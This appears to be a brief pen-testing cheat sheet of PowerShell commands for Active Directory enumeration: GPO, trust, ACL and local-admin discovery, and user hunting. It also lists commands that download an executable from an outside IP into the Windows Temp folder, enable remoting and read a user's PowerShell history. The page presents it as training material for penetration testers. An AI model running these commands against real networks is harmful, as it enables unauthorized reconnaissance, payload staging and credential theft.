Introduction to Active Directory enumeration with PowerShell for pen-testers. Understand how to start enumerating a Domain Controller and escalate your privileges inside the network.

GROUP POLICY (GPO) ENUMERATION

Get-NetGPO -ComputerName client-02.rfs.lab
Find-GPOComputerAdmin –Computername client-02.rfs.lab
Find-GPOLocation -UserName Rfs
Get-NetOU

Enumerate Domain trusts

Get-NetDomainTrust
Get-NetForest
Get-NetForest -Forest rfs.lab
Get-NetForestDomain
Get-NetForestCatalog
Get-NetForestTrust

ACLs Enumeration

Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"

Enumerating Users

Find-LocalAdminAccess
Invoke-EnumerateLocalAdmin
Invoke-UserHunter
Invoke-UserHunter -UserName "rfs"
Invoke-UserHunter -CheckAccess

Download Files

(New-Object Net.WebClient).DownloadFile("http://10.10.39.96:80/taskkill.exe","C:\Windows\Temp\rfs.exe")

Invoke WebRequest

Invoke-WebRequest "http://10.10.39.96:80/rfs.exe" -OutFile "rfs.exe"

Windows Remote Management WinRM

enable-psremoting -force
Enable-PSRemoting

PowerShell History

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Penetration Testing, Windows Penetration Testing